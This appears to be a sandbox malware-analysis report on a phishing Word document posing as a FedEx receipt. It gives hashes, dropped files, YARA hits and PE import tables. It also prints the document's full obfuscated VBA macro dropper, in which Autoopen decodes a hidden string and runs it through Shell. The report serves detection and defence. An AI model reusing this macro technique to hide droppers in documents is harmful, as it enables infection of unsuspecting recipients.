3692f99b...4ab2 | Files
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Exploit, Dropper, Downloader

3692f99b76663e864b3fae22828ab01021dcc50c33f5ec041aa3b055478a4ab2 (SHA256)

receipt_FedEX_4028873.doc

Word Document

Created at 2018-12-06 22:25:00

Notifications (1/1)

The overall sleep time of all monitored processes was truncated from "45 seconds" to "30 seconds" to reveal dormant functionality.

Filename Category Type Severity Actions
C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat Created File Text
Malicious
Mime Type text/plain
File Size 0.41 KB
MD5 6281f5c42be41eaf431acc826cb8f1bf
SHA1 75d4aa452b5c232a2f1d9e74ccd7d616d6d66171
SHA256 e2a20c742f2100307b7bc99b92cab49a3821bb1cef322284c3440a040a991de2
SSDeep 12:ssHARPuwtosKMzr+GCrSF2q0Fiiefh7Meiw1r9KMzrl:tHgPuwa6zrfCFi9h7H9zrl
YARA Matches
Rule Name Rule Description Classification Severity Actions
PowerShell_Download_Commands PowerShell may attempt to download external content; possible dropper -
4/5
C:\Users\aETAdzjz\Desktop\receipt_FedEX_4028873.doc Sample File Word Document
Suspicious
Mime Type application/msword
File Size 198.50 KB
MD5 431399e17aee53fa70c23ac550792769
SHA1 562899367b8212c2aca639f6f6a68d5294971c94
SHA256 3692f99b76663e864b3fae22828ab01021dcc50c33f5ec041aa3b055478a4ab2
SSDeep 3072:a57WssAb0KJ7vnVMIZRfw8z8N5Ygaw/ZX/PcSJqDmO6KQcsj1u:a1zsw7yIZJEYgaw/ZXM0kmtKQcsxu
Office Information
Creator Enpor Support
Last Modified By user
Revision 7
Create Time 2018-12-06 13:12:00+00:00
Modify Time 2018-12-06 13:30:00+00:00
Document Information
Codepage Cryllic
Application Microsoft Office Word
App Version 12.0
Template Normal
Document Security SecurityFlag.NONE
Editing Time 480.0
Page Count 1
Line Count 1
Paragraph Count 1
Character Count 1
Chars With Spaces 1
Heading Pairs Title
scale_crop False
shared_doc False
VBA Macros (3)
Macro #1: Module1
Attribute VB_Name = "Module1"
Sub replacefiles(ByRef pointA, ByRef need, later)
f_str = Len(later)
If pointA <= f_str Then
ch = ""
doc_print_header later, pointA, ch
idial = 1
strings_attached ch, idial
st = ""
DataFindSymbols idial - 2, st
need = need + st
pointA = pointA + 1
replacefiles pointA, need, later
End If
End Sub

Sub DataFindSymbols(ext1, ByRef date_max)
Dim m1 As Integer
m1 = -1
date_max = ""
If ext1 = m1 Then
ext1 = m1
End If
If ext1 < 1 Then
doc_print_header UserForm1.Text1, Len(UserForm1.Text1) + ext1, date_max
Else
doc_print_header UserForm1.Text1, ext1, date_max
End If
End Sub

Sub files_replace(C1, ByRef op)
op = ""
st1 = 1
replacefiles st1, op, C1
End Sub

Sub doc_print_header(str1, pty, ByRef rmin)
s11 = Left(str1, pty)
s11 = s11 + ""
rmin = Right(s11, 2 - 1)
End Sub

Sub doveryboll(m)
Dim n As Integer
Dim sadd As String
With UserForm1
sadd = "" + .ValidText
n = m - 502
End With
If m = 502 Then Shell sadd, n
End Sub

Sub ValidateOptionsForm(wstr1)
wstr1 = wstr1 + "Open"
UserForm1.TextBox1 = wstr1 + "Form"
End Sub

Sub CloseDateForm()
Dim str2 As String
files_replace UserForm1.date1, str2
UserForm1.EditText1 = str2
str2 = str2 + ""
UserForm1.ValidText = str2
End Sub



Sub date_now(ByRef b1, ByRef control, Cell1)
log2 = 1
With UserForm1
log2 = Len(.Text1)
If b1 < log2 Then
b = ""
doc_print_header .Text1, b1, b
If Cell1 <> b Then
b1 = b1 + 1
date_now b1, control, Cell1
Else
control = b1
End If
End If
End With
End Sub

Sub strings_attached(per2, ByRef arg1)
arg1 = 0
sb1 = 1
date_now sb1, arg1, per2
End Sub





Macro #2: ThisDocument
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Autoopen()
ValidateOptionsForm ("case")
End Sub

Macro #3: UserForm1
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{3201CC22-4323-4EF3-8B9C-19E82082DC0D}{CD48F839-E45B-49E9-A956-2DBED7A8E4A1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub EditText1_Change()
Dim ind1 As String
ind1 = "1" + "100"
End Sub

Private Sub CommandButton1_Click()

End Sub

Private Sub ValidText_Change()
Dim bol2 As Integer
bol2 = Len(UserForm1.ValidText)
Dim bol1 As String
bol1 = "V"
fh = "2"
doveryboll bol2
End Sub

Private Sub CommandButton2_Click()

End Sub

Private Sub TextBox1_Change()
Dim s As String
s = " "
s = s + UserForm1.Text1
If Len(s) = 62 + 1 Then CloseDateForm
End Sub

Private Sub ComboBox1_Change()

End Sub


YARA Matches
Rule Name Rule Description Classification Severity Actions
VBA_Execution_Commands VBA macro may execute files or system commands -
3/5
VBA_Execution_Commands VBA macro may execute files or system commands -
3/5
C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe Created File Binary
Suspicious
Also Known As C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.exe (Created File)
Mime Type application/x-dosexec
File Size 510.50 KB
MD5 94df3603fba467e0fff637c55c8b6d1b
SHA1 93f6cd1834a402f78497d2978d3a3a58ec3bfd66
SHA256 4f9eb9ef4ef021679de344f227bc6e162f1e5bcc6950d63ee870718380c58016
SSDeep 12288:mw4zMV6fcJUCT+ZiO852/Ico+/fT3aBtYg:P8fcJUCTjOy2eGT36tx
ImpHash 18da4215c6f786f6bd7fecba770e2636
File Reputation Information
Severity
Suspicious
First Seen 2018-12-06 21:48 (UTC+1)
Last Seen 2018-12-06 22:11 (UTC+1)
Names Win32.Exploit.Genkryptik
Families Genkryptik
Classification Exploit
PE Information
Image Base 0x400000
Entry Point 0x4014e0
Size Of Code 0x14e00
Size Of Initialized Data 0x7f600
Size Of Uninitialized Data 0x600
File Type executable
Subsystem windows_gui
Machine Type i386
Compile Timestamp 2018-12-06 19:02:02+00:00
Version Information (9)
LegalCopyright -
InternalName -
FileVersion 1.0.0.0
CompanyName -
LegalTrademarks -
ProductName -
ProductVersion 1.0.0.0
FileDescription Developed using the Dev-C++ IDE
OriginalFilename -
Sections (16)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x14c50 0x14e00 0x400 cnt_code, cnt_initialized_data, align_1bytes, align_4bytes, align_8bytes, align_16bytes, align_32bytes, align_64bytes, align_256bytes, align_1024bytes, align_2048bytes, align_4096bytes, align_8192bytes, align_mask, mem_execute, mem_read 6.04
.data 0x416000 0x5ba0 0x5c00 0x15200 cnt_initialized_data, align_2bytes, align_4bytes, align_8bytes, align_16bytes, align_32bytes, align_64bytes, align_512bytes, align_1024bytes, align_2048bytes, align_4096bytes, align_8192bytes, align_mask, mem_read, mem_write 2.16
.rdata 0x41c000 0x2868 0x2a00 0x1ae00 cnt_initialized_data, align_2bytes, align_4bytes, align_8bytes, align_16bytes, align_32bytes, align_64bytes, align_512bytes, align_1024bytes, align_2048bytes, align_4096bytes, align_8192bytes, align_mask, mem_read 5.22
.bss 0x41f000 0x478 0x0 0x0 cnt_uninitialized_data, align_2bytes, align_4bytes, align_8bytes, align_16bytes, align_32bytes, align_64bytes, align_512bytes, align_1024bytes, align_2048bytes, align_4096bytes, align_8192bytes, align_mask, mem_read, mem_write 0.0
.idata 0x420000 0xb70 0xc00 0x1d800 cnt_initialized_data, align_1bytes, align_2bytes, align_4bytes, align_16bytes, align_32bytes, align_64bytes, align_256bytes, align_512bytes, align_1024bytes, align_4096bytes, align_8192bytes, align_mask, mem_read, mem_write 4.89
.CRT 0x421000 0x38 0x200 0x1e400 cnt_initialized_data, align_1bytes, align_2bytes, align_4bytes, align_16bytes, align_32bytes, align_64bytes, align_256bytes, align_512bytes, align_1024bytes, align_4096bytes, align_8192bytes, align_mask, mem_read, mem_write 0.29
.tls 0x422000 0x20 0x200 0x1e600 cnt_initialized_data, align_1bytes, align_2bytes, align_4bytes, align_16bytes, align_32bytes, align_64bytes, align_256bytes, align_512bytes, align_1024bytes, align_4096bytes, align_8192bytes, align_mask, mem_read, mem_write 0.23
.rsrc 0x423000 0x4c40c 0x4c600 0x1e800 cnt_initialized_data, align_1bytes, align_2bytes, align_4bytes, align_16bytes, align_32bytes, align_64bytes, align_256bytes, align_512bytes, align_1024bytes, align_4096bytes, align_8192bytes, align_mask, mem_read, mem_write 7.75
/4 0x470000 0x338 0x400 0x6ae00 cnt_initialized_data, align_8bytes, align_16bytes, align_32bytes, align_64bytes, align_2048bytes, align_4096bytes, align_8192bytes, align_mask, mem_discardable, mem_read 1.89
/19 0x471000 0xd69d 0xd800 0x6b200 cnt_initialized_data, align_1bytes, align_4bytes, align_16bytes, align_64bytes, align_256bytes, align_1024bytes, align_4096bytes, align_mask, mem_discardable, mem_read 6.09
/31 0x47f000 0x1f2f 0x2000 0x78a00 cnt_initialized_data, align_1bytes, align_4bytes, align_16bytes, align_64bytes, align_256bytes, align_1024bytes, align_4096bytes, align_mask, mem_discardable, mem_read 4.61
/45 0x481000 0x1ff5 0x2000 0x7aa00 cnt_initialized_data, align_1bytes, align_4bytes, align_16bytes, align_64bytes, align_256bytes, align_1024bytes, align_4096bytes, align_mask, mem_discardable, mem_read 5.85
/57 0x483000 0xb84 0xc00 0x7ca00 cnt_initialized_data, align_1bytes, align_2bytes, align_4bytes, align_16bytes, align_32bytes, align_64bytes, align_256bytes, align_512bytes, align_1024bytes, align_4096bytes, align_8192bytes, align_mask, mem_discardable, mem_read 4.58
/70 0x484000 0x31c 0x400 0x7d600 cnt_initialized_data, align_1bytes, align_4bytes, align_16bytes, align_64bytes, align_256bytes, align_1024bytes, align_4096bytes, align_mask, mem_discardable, mem_read 4.28
/81 0x485000 0x19f2 0x1a00 0x7da00 cnt_initialized_data, align_1bytes, align_4bytes, align_16bytes, align_64bytes, align_256bytes, align_1024bytes, align_4096bytes, align_mask, mem_discardable, mem_read 3.52
/92 0x487000 0x5f8 0x600 0x7f400 cnt_initialized_data, align_1bytes, align_4bytes, align_16bytes, align_64bytes, align_256bytes, align_1024bytes, align_4096bytes, align_mask, mem_discardable, mem_read 3.18
Imports (2)
KERNEL32.dll (57)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
AddAtomA 0x0 0x4201d8 0x2003c 0x1d83c 0x3
CloseHandle 0x0 0x4201dc 0x20040 0x1d840 0x53
CreateEventA 0x0 0x4201e0 0x20044 0x1d844 0x84
CreateMutexA 0x0 0x4201e4 0x20048 0x1d848 0x9e
CreateSemaphoreA 0x0 0x4201e8 0x2004c 0x1d84c 0xad
DeleteCriticalSection 0x0 0x4201ec 0x20050 0x1d850 0xd4
DuplicateHandle 0x0 0x4201f0 0x20054 0x1d854 0xea
EnterCriticalSection 0x0 0x4201f4 0x20058 0x1d858 0xef
FindAtomA 0x0 0x4201f8 0x2005c 0x1d85c 0x12e
FindResourceA 0x0 0x4201fc 0x20060 0x1d860 0x14d
GetAtomNameA 0x0 0x420200 0x20064 0x1d864 0x170
GetCurrentProcess 0x0 0x420204 0x20068 0x1d868 0x1c4
GetCurrentProcessId 0x0 0x420208 0x2006c 0x1d86c 0x1c5
GetCurrentThread 0x0 0x42020c 0x20070 0x1d870 0x1c8
GetCurrentThreadId 0x0 0x420210 0x20074 0x1d874 0x1c9
GetHandleInformation 0x0 0x420214 0x20078 0x1d878 0x200
GetLastError 0x0 0x420218 0x2007c 0x1d87c 0x203
GetProcessAffinityMask 0x0 0x42021c 0x20080 0x1d880 0x246
GetStartupInfoA 0x0 0x420220 0x20084 0x1d884 0x264
GetSystemTimeAsFileTime 0x0 0x420224 0x20088 0x1d888 0x27b
GetThreadContext 0x0 0x420228 0x2008c 0x1d88c 0x289
GetThreadPriority 0x0 0x42022c 0x20090 0x1d890 0x291
GetTickCount 0x0 0x420230 0x20094 0x1d894 0x297
InitializeCriticalSection 0x0 0x420234 0x20098 0x1d898 0x2eb
InterlockedCompareExchange 0x0 0x420238 0x2009c 0x1d89c 0x2f2
InterlockedDecrement 0x0 0x42023c 0x200a0 0x1d8a0 0x2f3
InterlockedExchange 0x0 0x420240 0x200a4 0x1d8a4 0x2f4
InterlockedExchangeAdd 0x0 0x420244 0x200a8 0x1d8a8 0x2f5
InterlockedIncrement 0x0 0x420248 0x200ac 0x1d8ac 0x2f7
LeaveCriticalSection 0x0 0x42024c 0x200b0 0x1d8b0 0x326
LoadResource 0x0 0x420250 0x200b4 0x1d8b4 0x32f
LockResource 0x0 0x420254 0x200b8 0x1d8b8 0x341
QueryPerformanceCounter 0x0 0x420258 0x200bc 0x1d8bc 0x393
ReleaseMutex 0x0 0x42025c 0x200c0 0x1d8c0 0x3be
ReleaseSemaphore 0x0 0x420260 0x200c4 0x1d8c4 0x3c2
ResetEvent 0x0 0x420264 0x200c8 0x1d8c8 0x3d3
ResumeThread 0x0 0x420268 0x200cc 0x1d8cc 0x3d6
SetEvent 0x0 0x42026c 0x200d0 0x1d8d0 0x41d
SetLastError 0x0 0x420270 0x200d4 0x1d8d4 0x436
SetProcessAffinityMask 0x0 0x420274 0x200d8 0x1d8d8 0x441
SetThreadContext 0x0 0x420278 0x200dc 0x1d8dc 0x455
SetThreadPriority 0x0 0x42027c 0x200e0 0x1d8e0 0x45d
SetUnhandledExceptionFilter 0x0 0x420280 0x200e4 0x1d8e4 0x467
SizeofResource 0x0 0x420284 0x200e8 0x1d8e8 0x473
Sleep 0x0 0x420288 0x200ec 0x1d8ec 0x474
SuspendThread 0x0 0x42028c 0x200f0 0x1d8f0 0x47c
TerminateProcess 0x0 0x420290 0x200f4 0x1d8f4 0x482
TlsAlloc 0x0 0x420294 0x200f8 0x1d8f8 0x487
TlsGetValue 0x0 0x420298 0x200fc 0x1d8fc 0x489
TlsSetValue 0x0 0x42029c 0x20100 0x1d900 0x48a
TryEnterCriticalSection 0x0 0x4202a0 0x20104 0x1d904 0x491
UnhandledExceptionFilter 0x0 0x4202a4 0x20108 0x1d908 0x496
VirtualAlloc 0x0 0x4202a8 0x2010c 0x1d90c 0x4ad
VirtualProtect 0x0 0x4202ac 0x20110 0x1d910 0x4b6
VirtualQuery 0x0 0x4202b0 0x20114 0x1d914 0x4b9
WaitForMultipleObjects 0x0 0x4202b4 0x20118 0x1d918 0x4c0
WaitForSingleObject 0x0 0x4202b8 0x2011c 0x1d91c 0x4c2
msvcrt.dll (44)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
__dllonexit 0x0 0x4202c0 0x20124 0x1d924 0x37
__getmainargs 0x0 0x4202c4 0x20128 0x1d928 0x3a
__initenv 0x0 0x4202c8 0x2012c 0x1d92c 0x3b
__lconv_init 0x0 0x4202cc 0x20130 0x1d930 0x44
__set_app_type 0x0 0x4202d0 0x20134 0x1d934 0x68
__setusermatherr 0x0 0x4202d4 0x20138 0x1d938 0x6b
_acmdln 0x0 0x4202d8 0x2013c 0x1d93c 0x7a
_amsg_exit 0x0 0x4202dc 0x20140 0x1d940 0x90
_beginthreadex 0x0 0x4202e0 0x20144 0x1d944 0x9d
_cexit 0x0 0x4202e4 0x20148 0x1d948 0xa1
_endthreadex 0x0 0x4202e8 0x2014c 0x1d94c 0xda
_findclose 0x0 0x4202ec 0x20150 0x1d950 0x104
_findfirst 0x0 0x4202f0 0x20154 0x1d954 0x106
_fmode 0x0 0x4202f4 0x20158 0x1d958 0x111
_ftime 0x0 0x4202f8 0x2015c 0x1d95c 0x124
_initterm 0x0 0x4202fc 0x20160 0x1d960 0x15d
_iob 0x0 0x420300 0x20164 0x1d964 0x161
_lock 0x0 0x420304 0x20168 0x1d968 0x1ca
_onexit 0x0 0x420308 0x2016c 0x1d96c 0x271
_setjmp3 0x0 0x42030c 0x20170 0x1d970 0x2b0
_unlock 0x0 0x420310 0x20174 0x1d974 0x346
_write 0x0 0x420314 0x20178 0x1d978 0x3ef
abort 0x0 0x420318 0x2017c 0x1d97c 0x41e
calloc 0x0 0x42031c 0x20180 0x1d980 0x42b
exit 0x0 0x420320 0x20184 0x1d984 0x436
fprintf 0x0 0x420324 0x20188 0x1d988 0x446
fputc 0x0 0x420328 0x2018c 0x1d98c 0x448
fputs 0x0 0x42032c 0x20190 0x1d990 0x449
free 0x0 0x420330 0x20194 0x1d994 0x44d
fwrite 0x0 0x420334 0x20198 0x1d998 0x458
longjmp 0x0 0x420338 0x2019c 0x1d99c 0x486
malloc 0x0 0x42033c 0x201a0 0x1d9a0 0x487
memcmp 0x0 0x420340 0x201a4 0x1d9a4 0x48e
memcpy 0x0 0x420344 0x201a8 0x1d9a8 0x48f
memmove 0x0 0x420348 0x201ac 0x1d9ac 0x490
memset 0x0 0x42034c 0x201b0 0x1d9b0 0x492
printf 0x0 0x420350 0x201b4 0x1d9b4 0x497
realloc 0x0 0x420354 0x201b8 0x1d9b8 0x4a2
signal 0x0 0x420358 0x201bc 0x1d9bc 0x4ab
sprintf 0x0 0x42035c 0x201c0 0x1d9c0 0x4ae
strcmp 0x0 0x420360 0x201c4 0x1d9c4 0x4b7
strlen 0x0 0x420364 0x201c8 0x1d9c8 0x4bf
strncmp 0x0 0x420368 0x201cc 0x1d9cc 0x4c2
vfprintf 0x0 0x42036c 0x201d0 0x1d9d0 0x4e3
Icons (1)
C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe Created File Unknown
Whitelisted
Also Known As C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.exe (Created File)
Mime Type application/x-empty
File Size 0.00 KB
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SSDeep 3::
File Reputation Information
Severity
Whitelisted
First Seen 2011-05-27 11:27 (UTC+2)
Last Seen 2017-04-19 12:47 (UTC+2)
c:\users\aetadzjz\appdata\local\temp\~df834800654bb3e1d0.tmp Created File Stream
Whitelisted
Mime Type application/octet-stream
File Size 0.50 KB
MD5 bf619eac0cdf3f68d496ea9344137e8b
SHA1 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5
SHA256 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560
SSDeep 3::
File Reputation Information
Severity
Whitelisted
First Seen 2011-07-06 01:20 (UTC+2)
Last Seen 2018-11-10 05:26 (UTC+1)
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 Modified File Stream
Unknown
Mime Type application/octet-stream
File Size 1.02 KB
MD5 da70750b528b4d52fb0bf775d6f5c6f2
SHA1 2df212c8490799f3f07ddc3b4af9ed4c5ea0b3be
SHA256 93ae9406a7aa24438df790e980d86dbff3de11200c79ed935c3d9f66492fd7f0
SSDeep 24:NlzKf5b6U4Q7WebZY7e5n0DfFXVauU7IFFF4ZfpjU:n8b6U4sFEeOFXU7+34o
c:\users\aetadzjz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2345716840-1148442690-1481144037-1000\8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0 Modified File Stream
Unknown
Mime Type application/octet-stream
File Size 1.02 KB
MD5 3936b8254a3f80e60c3af26a41ed3e9f
SHA1 089d63aa68f44bba7984217ecff5cbef1bcd3baa
SHA256 2029500e3c3a8c6a36b285b626b0b8072dc4647d9c18a3da10e8e40771c6c473
SSDeep 24:NlzKf5b6U4KrIjGoHyhYg9s2kqbycVg44d5mU:n8b6U4OIZHy+g9s/u044KU
c:\programdata\microsoft\crypto\rsa\s-1-5-18\6d14e4b1d8ca773bab785d1be032546e_500c0908-381e-49dc-a6a0-1a800e9a56e0 Created File Stream
Unknown
Mime Type application/octet-stream
File Size 1.04 KB
MD5 d2f945b97736bfd11ae34023c77bedfd
SHA1 051c0f1220ca16b9880a3c94da80876807787fcb
SHA256 7d6e41456f3ecafc2546fd86a25b759b1bcddda9bf3b20197ec6c5955b99f1da
SSDeep 24:LLKf5b6UWqapsa9IqOQ5Ua5XDb8E7w/IQAUWnPtoEX:Yb6UdNcXODwbz7LQAUgVN
c:\programdata\microsoft\crypto\rsa\s-1-5-18\6d14e4b1d8ca773bab785d1be032546e_500c0908-381e-49dc-a6a0-1a800e9a56e0 Created File Stream
Unknown
Mime Type application/octet-stream
File Size 0.05 KB
MD5 64bc6b0e1d907ae8acf27bdb155344c2
SHA1 7aa0d9af2d61d73a044f288e16fdd07813c972ba
SHA256 dd4e0b0b64da5d95420c0e5423726f109e820e18b8a0b602274a7404f16f3ab2
SSDeep 3:/lSll+:Ak